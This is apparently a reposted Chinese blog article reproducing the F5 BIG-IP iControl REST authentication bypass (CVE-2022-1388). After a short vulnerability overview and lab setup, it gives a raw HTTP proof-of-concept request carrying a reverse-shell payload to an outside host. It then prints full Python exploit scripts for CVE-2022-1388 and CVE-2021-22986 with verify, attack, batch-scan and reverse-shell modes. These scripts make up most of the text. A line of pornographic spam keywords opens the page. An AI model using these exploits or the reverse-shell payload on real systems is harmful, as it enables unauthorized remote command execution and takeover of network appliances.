国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

F5 BIG-IP iControl REST命令執(zhí)行(CVE-2022-1388)

這篇具有很好參考價值的文章主要介紹了F5 BIG-IP iControl REST命令執(zhí)行(CVE-2022-1388)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

漏洞概述

2022年5月6日,F(xiàn)5官方發(fā)布了BIG-IP iControl REST的風(fēng)險通告,漏洞編號為CVE-2022-1388,漏洞等級為嚴(yán)重。F5 BIG-IP是美國F5公司的一款集成了網(wǎng)絡(luò)流量、應(yīng)用程序安全管理、負(fù)載均衡等功能的應(yīng)用交付平臺。iControl REST是iControl框架的演變,使用REpresentational State Transfer。這允許用戶或腳本與設(shè)備之間進(jìn)行輕量級、快速的交互。
組件:F5 BIG-IP iControl REST
漏洞類型:身份驗(yàn)證繞過
影響:命令執(zhí)行
簡述:該漏洞允許未經(jīng)身份驗(yàn)證的攻擊者通過管理口或自 身ip地址對BIG-IP系統(tǒng)進(jìn)行系統(tǒng)訪問,以執(zhí)行任 意系統(tǒng)命令,創(chuàng)建或刪除文件以及禁用BIG-IP上的服務(wù)。

漏洞驗(yàn)證

版本:BIGIP-13.1.3.3-0.0.6
需要到F5官方去進(jìn)行賬號注冊后,要半天時間才能收到激活郵件,才能下載F5的鏡像,然后需要用郵件中發(fā)送的激活碼將F5激活。F5安裝激活教程,我這里選擇的是低版本,系統(tǒng)用戶賬號密碼:root/default,web密碼:admin/admin。高版本激活比較復(fù)雜,還需要更改系統(tǒng)密碼,web密碼也有更改,在網(wǎng)上沒找到。
F5官網(wǎng):F5官網(wǎng)
F5下載地址:下載

訪問F地址ip+/mgmt/shared/authn/login,如果返回中存在 resterrorresponse,則說明存在漏洞。
bigip漏洞,漏洞復(fù)現(xiàn),tcp/ip,安全,web安全
poc :
重點(diǎn)字段是:X-F5-Auth-Token,Authorization,Connection,通過這幾個完成攻擊。

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.0.104
X-F5-Auth-Token:'a'
Authorization:Basic YWRtaW46QVNhc1M=
Connection:Keep-alive,X-F5-Auth-Token
Content-Length: 82

{"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/192.168.0.101/7777 0>&1'"} 

然后我對比了一下F5的CVE-2021-22986的poc兩者之間差不多,只是繞過方式不一樣,命令執(zhí)行的接口都是一樣的。

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.1.123:8443
Connection: close
Content-Length: 39
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token: 
Upgrade-Insecure-Requests: 1
Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}

重要字段:Authorization:,X-F5-Auth-Token,
CVE-2022-1388的腳本用于檢測和攻擊,來自github。
check.py

#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 Caps, Inc. All Rights Reserved
#
# @Time    : 2022/5/7 23:40
# @Author  : Caps
# @Email   : admin@safeinfo.me
# @File    : check.py
# @Software: PyCharm
import requests
import argparse

requests.packages.urllib3.disable_warnings()


def usage():
    print('''
    +-----------------------------------------------------------------+
    漏洞名稱: F5 BIG-IP iControl Rest API exposed Check
    功能:單個檢測,批量檢測                                     
    單個檢測:python exp.py -u url
    批量檢測:python exp.py -f url.txt
    +-----------------------------------------------------------------+                                     
    ''')


def check(url):
    try:
        target_url = url + "/mgmt/shared/authn/login"
        res = requests.get(target_url, verify=False, timeout=3)
        if "resterrorresponse" in res.text:
            print(f"\033[0;31;22m[+] Host: {url} F5 iControl Rest API exposed \033[0m")
        else:
            print(f"\033[0;32;22m[-] Host: {url} F5 not vulnerability \033[0m")
    except Exception as e:
        print(f"\033[0;33;22m[x] Host: {url} Connection Fail \033[0m")


def run(filepath):
    urls = [x.strip() for x in open(filepath, "r").readlines()]
    for u in urls:
        check(u)
    return check


def main():
    parse = argparse.ArgumentParser()
    parse.add_argument("-u", "--url", help="Please Poc.py -u host")
    parse.add_argument("-f", "--file", help="Please poc.py -f file")
    args = parse.parse_args()
    url = args.url
    filepath = args.file
    if url is not None and filepath is None:
        check(url)
    elif url is None and filepath is not None:
        run(filepath)
    else:
        usage()


if __name__ == '__main__':
    main()


exp.py

#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 Caps, Inc. All Rights Reserved 
#
# @Time    : 2022/5/9 16:52
# @Author  : Caps
# @Email   : admin@safeinfo.me
# @File    : CVE-2022-1388.py
# @Software: PyCharm
import requests
import sys
import argparse
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

t = int(time.time())


def title():
    print('''
     _____  _   _  _____        _____  _____  _____  _____        __   _____  _____  _____ 
    /  __ \| | | ||  ___|      / __  \|  _  |/ __  \/ __  \      /  | |____ ||  _  ||  _  |
    | /  \/| | | || |__  ______`' / /'| |/' |`' / /'`' / /'______`| |     / / \ V /  \ V / 
    | |    | | | ||  __||______| / /  |  /| |  / /    / / |______|| |     \ \ / _ \  / _ \ 
    | \__/\\ \_/ /| |___       ./ /___\ |_/ /./ /___./ /___      _| |_.___/ /| |_| || |_| |
     \____/ \___/ \____/       \_____/ \___/ \_____/\_____/      \___/\____/ \_____/\_____/                                                                                                                                                                                                                                                          
                                                        Author:Caps@BUGFOR
                                                        Github:https://github.com/bytecaps
    ''')
    print('''
        驗(yàn)證模式:python CVE_2022_1388.py -v true -u target_url 
        攻擊模式:python CVE_2022_1388.py -a true -u target_url -c command 
        批量檢測:python CVE_2022_1388.py -s true -f file
        反彈模式:python CVE_2022_1388.py -r true -u target_url -c command 
        ''')


def headers():
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'Connection': 'keep-alive, x-F5-Auth-Token',
        'X-F5-Auth-Token': 'a',
        'Authorization': 'Basic YWRtaW46'
    }
    return headers


def check(target_url):
    check_url = target_url + '/mgmt/tm/util/bash'
    data = {'command': "run", 'utilCmdArgs': "-c id"}
    try:
        response = requests.post(url=check_url, json=data, headers=headers(), verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            print("[+] 目標(biāo) {} 存在漏洞".format(target_url))
        else:
            print("[-] 目標(biāo) {} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 訪問異常 {0}'.format(target_url))


def attack(target_url, cmd):
    attack_url = target_url + '/mgmt/tm/util/bash'
    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
    try:
        response = requests.post(url=attack_url, json=data, headers=headers(), verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            default = json.loads(response.text)
            display = default['commandResult']
            print("[+] 目標(biāo) {} 存在漏洞".format(target_url))
            print('[+] 響應(yīng)為:{0}'.format(display))
        else:
            print("[-] 目標(biāo) {} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 訪問異常 {0}'.format(target_url))


def reverse_shell(target_url, command):
    reverse_url = target_url + '/mgmt/tm/util/bash'
    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(command)}
    # command: bash -i >&/dev/tcp/192.168.174.129/8888 0>&1
    try:
        requests.post(url=reverse_url, json=data, headers=headers(), verify=False, timeout=5)
    except Exception as e:
        print("[+] 請自行查看是否反彈shell回來")


def scan(file):
    for url_link in open(file, 'r', encoding='utf-8'):
        if url_link.strip() != '':
            url_path = format_url(url_link.strip())
            check(url_path)


def format_url(url):
    try:
        if url[:4] != "http":
            url = "https://" + url
            url = url.strip()
        return url
    except Exception as e:
        print('URL 錯誤 {0}'.format(url))


def main():
    parser = argparse.ArgumentParser("F5 Big-IP RCE")
    parser.add_argument('-v', '--verify', type=bool, help=' 驗(yàn)證模式 ')
    parser.add_argument('-u', '--url', type=str, help=' 目標(biāo)URL ')

    parser.add_argument('-a', '--attack', type=bool, help=' 攻擊模式 ')
    parser.add_argument('-c', '--command', type=str, default="id", help=' 執(zhí)行命令 ')

    parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ')
    parser.add_argument('-f', '--file', type=str, help=' 文件路徑 ')

    parser.add_argument('-r', '--shell', type=bool, help=' 反彈shell模式 ')
    args = parser.parse_args()

    verify_model = args.verify
    url = args.url

    attack_model = args.attack
    command = args.command

    scan_model = args.scan
    file = args.file

    shell_model = args.shell

    if verify_model is True and url is not None:
        check(url)
    elif attack_model is True and url is not None and command is not None:
        attack(url, command)
    elif scan_model is True and file is not None:
        scan(file)
    elif shell_model is True and url is not None and command is not None:
        reverse_shell(url, command)
    else:
        sys.exit(0)


if __name__ == '__main__':
    title()
    main()

CVE-2021-22986的exp:文章來源地址http://www.zghlxwxcb.cn/news/detail-598814.html

import requests
import json
import sys
import argparse
import re
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

t = int(time.time())

def title():
    print('''
      ______ ____    ____  _______       ___     ___    ___    __        ___    ___     ___     ___      __   
     /      |\   \  /   / |   ____|     |__ \   / _ \  |__ \  /_ |      |__ \  |__ \   / _ \   / _ \    / /   
    |  ,----' \   \/   /  |  |__    ______ ) | | | | |    ) |  | |  ______ ) |    ) | | (_) | | (_) |  / /_   
    |  |       \      /   |   __|  |______/ /  | | | |   / /   | | |______/ /    / /   \__, |  > _ <  | '_ \  
    |  `----.   \    /    |  |____       / /_  | |_| |  / /_   | |       / /_   / /_     / /  | (_) | | (_) | 
     \______|    \__/     |_______|     |____|  \___/  |____|  |_|      |____| |____|   /_/    \___/   \___/                                                                                                                                                                             
    
                                Author:Al1ex@Heptagram
                                Github:https://github.com/Al1ex
    ''')
    print('''
        驗(yàn)證模式:python CVE_2021_22986.py -v true -u target_url 
        攻擊模式:python CVE_2021_22986.py -a true -u target_url -c command 
        批量檢測:python CVE_2021_22986.py -s true -f file
        反彈模式:python CVE_2021_22986.py -r true -u target_url -c command 
        ''')

def check(target_url):
    check_url = target_url + '/mgmt/tm/util/bash'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M='
    }
    data = {'command': "run",'utilCmdArgs':"-c id"}
    try:
        response = requests.post(url=check_url, json=data, headers=headers, verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            print("[+] 目標(biāo) {} 存在漏洞".format(target_url))
        else:
            print("[-] 目標(biāo) {} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 訪問異常 {0}'.format(target_url))

def attack(target_url,cmd):
    attack_url = target_url + '/mgmt/tm/util/bash'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M='
    }

    data = {'command': "run",'utilCmdArgs':"-c '{0}'".format(cmd)}
    try:
        response = requests.post(url=attack_url, json=data, headers=headers, verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            default = json.loads(response.text)
            display = default['commandResult']
            print("[+] 目標(biāo) {} 存在漏洞".format(target_url))
            print('[+] 響應(yīng)為:{0}'.format(display))
        else:
            print("[-] 目標(biāo) {} 不存在漏洞".format(target_url))  
    except Exception as e:
        print('url 訪問異常 {0}'.format(target_url))

def reverse_shell(target_url,command):
    reverse_url = target_url + '/mgmt/tm/util/bash'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M='
    }

    data = {'command': "run",'utilCmdArgs':"-c '{0}'".format(command)}
    # command: bash -i >&/dev/tcp/192.168.174.129/8888 0>&1
    try:
        requests.post(url=reverse_url, json=data, headers=headers, verify=False, timeout=5)
    except Exception as e:
        print("[+] 請自行查看是否反彈shell回來")

def scan(file):
    for url_link in open(file, 'r', encoding='utf-8'):
            if url_link.strip() != '':
                url_path = format_url(url_link.strip())
                check(url_path)

def format_url(url):
    try:
        if url[:4] != "http":
            url = "https://" + url
            url = url.strip()
        return url
    except Exception as e:
        print('URL 錯誤 {0}'.format(url))


def main():
    parser = argparse.ArgumentParser("F5 Big-IP RCE")
    parser.add_argument('-v', '--verify', type=bool,help=' 驗(yàn)證模式 ')
    parser.add_argument('-u', '--url', type=str, help=' 目標(biāo)URL ')

    parser.add_argument('-a', '--attack', type=bool, help=' 攻擊模式 ')
    parser.add_argument('-c', '--command', type=str, default="id", help=' 執(zhí)行命令 ')

    parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ')
    parser.add_argument('-f', '--file', type=str, help=' 文件路徑 ')


    parser.add_argument('-r', '--shell', type=bool, help=' 反彈shell模式 ')
    args = parser.parse_args()

    verify_model = args.verify
    url = args.url

    attack_model = args.attack
    command = args.command

    scan_model = args.scan
    file = args.file

    shell_model = args.shell


    if verify_model is True and url !=None:
        check(url)
    elif attack_model is True and url != None and command != None:
        attack(url,command)
    elif scan_model is True and file != None:
        scan(file)
    elif shell_model is True and url != None and command != None:
        reverse_shell(url,command)
    else:
        sys.exit(0)     

if __name__ == '__main__':
    title()
    main()

到了這里,關(guān)于F5 BIG-IP iControl REST命令執(zhí)行(CVE-2022-1388)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Cacti命令執(zhí)行漏洞復(fù)現(xiàn)(CVE-2022-46169)

    Cacti命令執(zhí)行漏洞復(fù)現(xiàn)(CVE-2022-46169)

    Cacti項(xiàng)目是一個開源平臺,可為用戶提供強(qiáng)大且可擴(kuò)展的操作監(jiān)控和故障管理框架。在1.2.22版本中存在一處命令注入漏洞,攻擊者可以通過X-Forwarded-For請求頭繞過服務(wù)端校驗(yàn)并在其中執(zhí)行任意命令。漏洞編號:CVE-2022-46169,漏洞等級:嚴(yán)重。 影響版本 Cacti == 1.2.22 不受影響版本

    2024年02月02日
    瀏覽(21)
  • TerraMaster TOS 遠(yuǎn)程命令執(zhí)行(CVE-2022-24989)TerraMaster TOS 敏感信息泄露(CVE-2022-24990)

    TerraMaster TOS 遠(yuǎn)程命令執(zhí)行(CVE-2022-24989)TerraMaster TOS 敏感信息泄露(CVE-2022-24990)

    一、漏洞名稱 TerraMaster TOS 遠(yuǎn)程命令執(zhí)行(CVE-2022-24989) TerraMaster TOS 敏感信息泄露(CVE-2022-24990) 二、影響版本 TerraMaster NAS 4.2.x 4.2.30 三、漏洞危害 遠(yuǎn)程命令執(zhí)行 敏感信息泄露 四、POC EXP ¤ 五、資產(chǎn)搜索 fofa: app=“TERRAMASTER-NAS” 六、漏洞背景 / 參考 / 延申 TerraMaster TOS 可能允

    2024年02月03日
    瀏覽(28)
  • [JAVA安全]CVE-2022-33980命令執(zhí)行漏洞分析

    [JAVA安全]CVE-2022-33980命令執(zhí)行漏洞分析

    在 i春秋的漏洞靶標(biāo)上看見了此漏洞,所以前來分析一下漏洞原理,比較也是去年 7月的漏洞。 漏洞描述:Apache官方發(fā)布安全公告,修復(fù)了一個存在于Apache Commons Configuration 組件的遠(yuǎn)程代碼執(zhí)行漏洞,漏洞編號:CVE-2022-33980,漏洞威脅等級:高危。惡意攻擊者通過該漏洞,可在

    2024年02月15日
    瀏覽(22)
  • 漏洞深度分析|CVE-2022-1471 SnakeYaml 命令執(zhí)行漏洞

    漏洞深度分析|CVE-2022-1471 SnakeYaml 命令執(zhí)行漏洞

    YAML是一種數(shù)據(jù)序列化格式,設(shè)計(jì)用于人類的可讀性和與腳本語言的交互。 SnakeYaml是一個完整的YAML1.1規(guī)范Processor,支持UTF-8/UTF-16,支持Java對象的序列化/反序列化,支持所有YAML定義的類型。 https://github.com/snakeyaml/snakeyaml SnakeYaml通常使用方法如下: new Yaml(new Constructor(TestDataC

    2023年04月27日
    瀏覽(27)
  • Spring Boot 目錄遍歷--表達(dá)式注入--代碼執(zhí)行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)

    Spring Boot 目錄遍歷--表達(dá)式注入--代碼執(zhí)行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)

    spring-boot-actuator-logview 是一個簡單的日志文件查看器作為Spring Boot執(zhí)行器端點(diǎn),在 0.2.13 版本之前存在著目錄遍歷漏洞,編號 CVE-2021-21234。漏洞本質(zhì)是Spring Boot 執(zhí)行器通過請求的參數(shù)來指定文件名和文件夾路徑,經(jīng)過組合拼接達(dá)到目錄遍歷,雖然源碼中檢查了文件名(filename)

    2024年02月08日
    瀏覽(61)
  • Atlassian Confluence遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2022-26134)

    Atlassian Confluence遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2022-26134)

    Atlassian Confluence遠(yuǎn)程代碼執(zhí)?漏洞(CVE-2022-26134),這是一個高危漏洞可通過該漏洞直接獲取目標(biāo)系統(tǒng)權(quán)限。 Atlassian Confluence是?個專業(yè)的企業(yè)知識管理與協(xié)同軟件,主要?于公司內(nèi)員?創(chuàng)建知識庫并建?知識管理流程,也可以?于構(gòu)建企業(yè)wiki。 之前看到過Confluence這個洞沒太在

    2024年02月16日
    瀏覽(55)
  • 復(fù)現(xiàn)CVE-2022-10270(向日葵遠(yuǎn)程代碼執(zhí)行漏洞)

    復(fù)現(xiàn)CVE-2022-10270(向日葵遠(yuǎn)程代碼執(zhí)行漏洞)

    目錄 引言 漏洞描述 影響版本: 原理: 環(huán)境搭建 手動復(fù)現(xiàn) 腳本復(fù)現(xiàn) 修復(fù)建議 ? ? ? ? 本文內(nèi)容僅供學(xué)習(xí)參考,若讀者利用本文內(nèi)容做出違法行為,筆者不提供擔(dān)保!??! ????????向日葵是一款免費(fèi)的,集遠(yuǎn)程控制電腦手機(jī)、遠(yuǎn)程桌面連接、遠(yuǎn)程開機(jī)、遠(yuǎn)程管理、支持

    2024年02月07日
    瀏覽(22)
  • [CVE-2022-30190]MICROSOFT OFFICE MSDT代碼執(zhí)行漏洞

    MSDT(Microsoft Support Diagnostics Tool,微軟支持診斷工具)是一個Windows實(shí)用程序,用于排除故障并收集診斷數(shù)據(jù)以供專業(yè)人員分析和解決問題。 Shadow Chaser Group 的研究人員在 Twitter 上表示,這個存在于Microsoft Support Diagnostic Tool中的漏洞已經(jīng)于4月 12日報(bào)告給微軟,并已經(jīng)證明該漏洞

    2024年02月04日
    瀏覽(16)
  • Microsoft Office MSDT代碼執(zhí)行漏洞(CVE-2022-30190)漏洞復(fù)現(xiàn)

    Microsoft Office MSDT代碼執(zhí)行漏洞(CVE-2022-30190)漏洞復(fù)現(xiàn)

    本文章僅供學(xué)習(xí)和研究使用,嚴(yán)禁使用該文章內(nèi)容對互聯(lián)網(wǎng)其他應(yīng)用進(jìn)行非法操作,若將其用于非法目的,所造成的后果由您自行承擔(dān),產(chǎn)生的一切風(fēng)險與本文作者無關(guān),如繼續(xù)閱讀該文章即表明您默認(rèn)遵守該內(nèi)容。 該漏洞首次發(fā)現(xiàn)在2022 年 5 月 27 日,由白俄羅斯的一個 I

    2024年02月06日
    瀏覽(29)
  • 【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠(yuǎn)程代碼執(zhí)行漏洞 (CVE-2022-30190)

    【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠(yuǎn)程代碼執(zhí)行漏洞 (CVE-2022-30190)

    0x01 Microsoft Office Microsoft Office是由Microsoft(微軟)公司開發(fā)的一套辦公軟件套裝。常用組件有 Word、Excel、PowerPoint等。 0x02 漏洞簡介 該文檔使用 Word 遠(yuǎn)程模板功能從遠(yuǎn)程網(wǎng)絡(luò)服務(wù)器檢索 HTML 文件,該服務(wù)器使用 ms-msdt MSProtocol URI 方案加載代碼并執(zhí)行 PowerShell,禁用宏,仍能通過

    2024年02月05日
    瀏覽(19)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包